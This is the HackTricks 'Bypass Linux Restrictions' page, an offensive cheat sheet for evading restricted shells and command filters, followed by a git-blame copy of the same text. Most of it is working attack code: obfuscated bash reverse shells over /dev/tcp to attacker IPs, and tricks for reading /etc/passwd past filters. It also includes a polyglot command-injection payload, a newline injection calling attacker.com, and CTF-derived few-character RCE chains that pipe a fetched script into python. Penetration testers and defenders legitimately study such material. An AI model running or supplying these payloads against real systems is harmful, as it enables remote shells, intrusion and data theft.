hacktricks/linux-hardening/bypass-bash-restrictions/README.md

# Bypass Linux Restrictions

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}

## Common Limitations Bypasses

### Reverse Shell

```bash
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```

### Short Rev shell

```bash
#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0
```

### Bypass Paths and forbidden words

```bash
# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost

# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami

# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
echo * #List current files and folders with echo and wildcard

# [chars]
/usr/bin/n[c] # /usr/bin/nc

# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64

#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h

# $@
who$@ami #whoami

# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64

# Execution through $0
echo whoami|$0

# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters

# New lines
p\
i\
n\
g # These 4 lines will equal to ping

# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown

# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami
```

### Bypass forbidden spaces

```bash
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test

# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd

# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
#  Other way, just change each space for ${IFS}
echo${IFS}test

# Using hex format
X=$'cat\x20/etc/passwd'&&$X

# Using tabs
echo "ls\x09-l" | bash

# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
```

### Bypass backslash and slash

```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```

### Bypass pipes

```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```

### Bypass with hex encoding

```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```

### Bypass IPs

```bash
# Decimal IPs
127.0.0.1 == 2130706433
```

### Time based data exfiltration

```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```

### Getting chars from Env Variables

```bash
echo ${LS_COLORS:10:1} #;
echo ${PATH:0:1} #/
```

### DNS data exfiltration

You could use **burpcollab** or [**pingb**](http://pingb.in) for example.

### Builtins

In case you cannot execute external functions and only have access to a **limited set of builtins to obtain RCE**, there are some handy tricks to do it. Usually you **won't be able to use all** of the **builtins**, so you should **know all your options** to try to bypass the jail. Idea from [**devploit**](https://twitter.com/devploit).\
First of all check all the [**shell builtins**](https://www.gnu.org/software/bash/manual/html\_node/Shell-Builtin-Commands.html)**.** Then here you have some **recommendations**:

```bash
# Get list of builtins
declare builtins

# In these cases PATH won't be set, so you can try to set it
PATH="/bin" /bin/ls
export PATH="/bin"
declare PATH="/bin"
SHELL=/bin/bash

# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")

# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa

# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords

# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}

# Read file with read
while read -r line; do echo $line; done < /etc/passwd

# Get env variables
declare

# Get history
history
declare history
declare historywords

# Disable special builtins chars so you can abuse them as scripts
[ #[: ']' expected
## Disable "[" as builtin and enable it as script
enable -n [
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
chmod +x [
export PATH=/tmp:$PATH
if [ "a" ]; then echo 1; fi # Will print hello!
```

### Polyglot command injection

```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```

### Bypass potential regexes

```bash
# A regex that only allow letters and numbers might be vulnerable to new line characters
1%0a`curl http://attacker.com`
```

### Bashfuscator

```bash
# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'
```

### RCE with 5 chars

```bash
# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file

## Finally execute the file "g"
http://host/?cmd=sh g


# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*

# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link 
## to it in the current folder
```

### RCE with 4 chars

```bash
# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'

# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'

# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'

# got shell
'sh x'
'sh g'
```

## Read-Only/Noexec/Distroless Bypass

If you are inside a filesystem with the **read-only and noexec protections** or even in a distroless container, there are still ways to **execute arbitrary binaries, even a shell!:**

{% content-ref url="bypass-fs-protections-read-only-no-exec-distroless/" %}
[bypass-fs-protections-read-only-no-exec-distroless](bypass-fs-protections-read-only-no-exec-distroless/)
{% endcontent-ref %}

## Chroot & other Jails Bypass

{% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %}
[escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md)
{% endcontent-ref %}

## References & More

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)
* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)
* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)

<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>

\
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00			`# Bypass Linux Restrictions`

a 2024-07-18 16:03:34 +00:00			`{% hint style="success" %}`
a 2024-07-18 16:14:56 +00:00			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`<details>`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`<summary>Support HackTricks</summary>`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
			`</details>`
a 2024-07-18 16:03:34 +00:00			`{% endhint %}`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
GitBook: No commit message 2024-05-05 17:56:05 +00:00			`<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
			`\`
GITBOOK-4348: No subject 2024-06-05 15:10:13 +00:00			`Use [Trickest](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) to easily build and automate workflows powered by the world's most advanced community tools.\`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00			`Get Access Today:`

Update README.md 2024-04-30 14:41:22 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
			`## Common Limitations Bypasses`

			`### Reverse Shell`

			```bash
			`# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time`
			`echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' \| base64 \| base64)\|ba''se''6''4 -''d\|ba''se''64 -''d\|b''a''s''h" \| sed 's/ /${IFS}/g'`
			`# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K\|ba''se''6''4${IFS}-''d\|ba''se''64${IFS}-''d\|b''a''s''h`
			```

			`### Short Rev shell`

			```bash
			`#Trick from Dikline`
			`#Get a rev shell with`
			`(sh)0>/dev/tcp/10.10.10.10/443`
			`#Then get the out of the rev shell executing inside of it:`
			`exec >&0`
			```

			`### Bypass Paths and forbidden words`

			```bash
			`# Question mark binary substitution`
			`/usr/bin/p?ng # /usr/bin/ping`
			`nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost`

			`# Wildcard(*) binary substitution`
			`/usr/bin/who*mi # /usr/bin/whoami`

			`# Wildcard + local directory arguments`
			`touch -- -la # -- stops processing options after the --`
			`ls *`
			`echo * #List current files and folders with echo and wildcard`

			`# [chars]`
			`/usr/bin/n[c] # /usr/bin/nc`

			`# Quotes`
			`'p'i'n'g # ping`
			`"w"h"o"a"m"i # whoami`
			`ech''o test # echo test`
			`ech""o test # echo test`
			`bas''e64 # base64`

			`#Backslashes`
			`\u\n\a\m\e \-\a # uname -a`
			`/\b\i\n/////s\h`

			`# $@`
			`who$@ami #whoami`

			`# Transformations (case, reverse, base64)`
			`$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case`
			`$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)`
			`$(rev<<<'imaohw') #whoami`
			`bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64`

			`# Execution through $0`
			`echo whoami\|$0`

			`# Uninitialized variables: A uninitialized variable equals to null (nothing)`
			`cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol`
			`p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters`

GITBOOK-4348: No subject 2024-06-05 15:10:13 +00:00			`# New lines`
			`p\`
			`i\`
			`n\`
			`g # These 4 lines will equal to ping`

GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00			`# Fake commands`
			`p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown`
			w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown

			`# Concatenation of strings using history`
			`!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command`
			`mi # This will throw an error`
			`whoa # This will throw an error`
			`!-1!-2 # This will execute whoami`
			```

			`### Bypass forbidden spaces`

			```bash
			`# {form}`
			`{cat,lol.txt} # cat lol.txt`
			`{echo,test} # echo test`

			`# IFS - Internal field separator, change " " for any other character ("]" in this case)`
			`cat${IFS}/etc/passwd # cat /etc/passwd`
			`cat$IFS/etc/passwd # cat /etc/passwd`

			`# Put the command line in a variable and then execute it`
			`IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b`
			`IFS=];b=cat]/etc/passwd;$b # Using 2 ";"`
			IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
			`# Other way, just change each space for ${IFS}`
			`echo${IFS}test`

			`# Using hex format`
			`X=$'cat\x20/etc/passwd'&&$X`

			`# Using tabs`
			`echo "ls\x09-l" \| bash`

			`# Undefined variables and !`
			`$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined`
			`uname!-1\-a # This equals to uname -a`
			```

			`### Bypass backslash and slash`

			```bash
			`cat ${HOME:0:1}etc${HOME:0:1}passwd`
			`cat $(echo . \| tr '!-0' '"-1')etc$(echo . \| tr '!-0' '"-1')passwd`
			```

			`### Bypass pipes`

			```bash
			`bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)`
			```

			`### Bypass with hex encoding`

			```bash
			`echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
			cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
			`abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc`
			`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
			cat `xxd -r -p <<< 2f6574632f706173737764`
			`xxd -r -ps <(echo 2f6574632f706173737764)`
			cat `xxd -r -ps <(echo 2f6574632f706173737764)`
			```

			`### Bypass IPs`

			```bash
			`# Decimal IPs`
			`127.0.0.1 == 2130706433`
			```

			`### Time based data exfiltration`

			```bash
			`time if [ $(whoami\|cut -c 1) == s ]; then sleep 5; fi`
			```

			`### Getting chars from Env Variables`

			```bash
			`echo ${LS_COLORS:10:1} #;`
			`echo ${PATH:0:1} #/`
			```

			`### DNS data exfiltration`

			`You could use burpcollab or [pingb](http://pingb.in) for example.`

			`### Builtins`

			`In case you cannot execute external functions and only have access to a limited set of builtins to obtain RCE, there are some handy tricks to do it. Usually you won't be able to use all of the builtins, so you should know all your options to try to bypass the jail. Idea from [devploit](https://twitter.com/devploit).\`
			`First of all check all the [shell builtins](https://www.gnu.org/software/bash/manual/html\_node/Shell-Builtin-Commands.html). Then here you have some recommendations:`

			```bash
			`# Get list of builtins`
			`declare builtins`

			`# In these cases PATH won't be set, so you can try to set it`
			`PATH="/bin" /bin/ls`
			`export PATH="/bin"`
			`declare PATH="/bin"`
			`SHELL=/bin/bash`

			`# Hex`
			`$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")`
			`$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")`

			`# Input`
			`read aaa; exec $aaa #Read more commands to execute and execute them`
			`read aaa; eval $aaa`

			`# Get "/" char using printf and env vars`
			`printf %.1s "$PWD"`
			`## Execute /bin/ls`
			`$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls`
			`## To get several letters you can use a combination of printf and`
			`declare`
			`declare functions`
			`declare historywords`

			`# Read flag in current dir`
			`source f*`
			`flag.txt:1: command not found: CTF{asdasdasd}`

			`# Read file with read`
			`while read -r line; do echo $line; done < /etc/passwd`

			`# Get env variables`
			`declare`

			`# Get history`
			`history`
			`declare history`
			`declare historywords`

			`# Disable special builtins chars so you can abuse them as scripts`
			`[ #[: ']' expected`
			`## Disable "[" as builtin and enable it as script`
			`enable -n [`
			`echo -e '#!/bin/bash\necho "hello!"' > /tmp/[`
			`chmod +x [`
			`export PATH=/tmp:$PATH`
			`if [ "a" ]; then echo 1; fi # Will print hello!`
			```

			`### Polyglot command injection`

			```bash
			`1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}`
			/$(sleep 5)`sleep 5``/-sleep(5)-'/$(sleep 5)`sleep 5` #/-sleep(5)\|\|'"\|\|sleep(5)\|\|"/`/
			```

			`### Bypass potential regexes`

			```bash
			`# A regex that only allow letters and numbers might be vulnerable to new line characters`
			1%0a`curl http://attacker.com`
			```

			`### Bashfuscator`

			```bash
			`# From https://github.com/Bashfuscator/Bashfuscator`
			`./bashfuscator -c 'cat /etc/passwd'`
			```

			`### RCE with 5 chars`

			```bash
			`# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge`
			`#Oragnge Tsai solution`
			## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
			`http://host/?cmd=>ls\`
			`http://host/?cmd=ls>_`
			`http://host/?cmd=>\ \`
			`http://host/?cmd=>-t\`
			`http://host/?cmd=>\>g`
			`http://host/?cmd=ls>>_`

			## Step2: generate `curl orange.tw\|python` to file "g"
			`## by creating the necesary filenames and writting that content to file "g" executing the previous generated file`
			`http://host/?cmd=>on`
			`http://host/?cmd=>th\`
			`http://host/?cmd=>py\`
			`http://host/?cmd=>\\|\`
			`http://host/?cmd=>tw\`
			`http://host/?cmd=>e.\`
			`http://host/?cmd=>ng\`
			`http://host/?cmd=>ra\`
			`http://host/?cmd=>o\`
			`http://host/?cmd=>\ \`
			`http://host/?cmd=>rl\`
			`http://host/?cmd=>cu\`
			`http://host/?cmd=sh _`
			`# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file`

			`## Finally execute the file "g"`
			`http://host/?cmd=sh g`


			`# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/`
			`# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"`
			`https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/`
			`## Execute tar command over a folder`
			`http://52.199.204.34/?cmd=>tar`
			`http://52.199.204.34/?cmd=>zcf`
			`http://52.199.204.34/?cmd=>zzz`
			`http://52.199.204.34/?cmd=%20/h`

			`# Another curiosity if you can read files of the current folder`
			`ln /f*`
			`## If there is a file /flag.txt that will create a hard link`
			`## to it in the current folder`
			```

			`### RCE with 4 chars`

			```bash
			`# In a similar fashion to the previous bypass this one just need 4 chars to execute commands`
			# it will follow the same principle of creating the command `ls -t>g` in a file
			`# and then generate the full command in filenames`
			`# generate "g> ht- sl" to file "v"`
			`'>dir'`
			`'>sl'`
			`'>g\>'`
			`'>ht-'`
			`'*>v'`

			`# reverse file "v" to file "x", content "ls -th >g"`
			`'>rev'`
			`'*v>x'`

			`# generate "curl orange.tw\|python;"`
			`'>\;\\'`
			`'>on\\'`
			`'>th\\'`
			`'>py\\'`
			`'>\\|\\'`
			`'>tw\\'`
			`'>e.\\'`
			`'>ng\\'`
			`'>ra\\'`
			`'>o\\'`
			`'>\ \\'`
			`'>rl\\'`
			`'>cu\\'`

			`# got shell`
			`'sh x'`
			`'sh g'`
			```

			`## Read-Only/Noexec/Distroless Bypass`

			`If you are inside a filesystem with the read-only and noexec protections or even in a distroless container, there are still ways to execute arbitrary binaries, even a shell!:`

			`{% content-ref url="bypass-fs-protections-read-only-no-exec-distroless/" %}`
			`[bypass-fs-protections-read-only-no-exec-distroless](bypass-fs-protections-read-only-no-exec-distroless/)`
			`{% endcontent-ref %}`

			`## Chroot & other Jails Bypass`

			`{% content-ref url="../privilege-escalation/escaping-from-limited-bash.md" %}`
			`[escaping-from-limited-bash.md](../privilege-escalation/escaping-from-limited-bash.md)`
			`{% endcontent-ref %}`

			`## References & More`

			`* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits)`
			`* [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)`
			`* [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)`
			`* [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)`

GitBook: No commit message 2024-05-05 17:56:05 +00:00			`<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
			`\`
GITBOOK-4348: No subject 2024-06-05 15:10:13 +00:00			`Use [Trickest](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=bypass-bash-restrictions) to easily build and automate workflows powered by the world's most advanced community tools.\`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00			`Get Access Today:`

Update README.md 2024-04-30 14:41:22 +00:00			`{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`{% hint style="success" %}`
a 2024-07-18 16:14:56 +00:00			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`<details>`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`<summary>Support HackTricks</summary>`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
a 2024-07-18 16:03:34 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
GITBOOK-4301: No subject 2024-04-06 16:25:58 +00:00
			`</details>`
a 2024-07-18 16:03:34 +00:00			`{% endhint %}`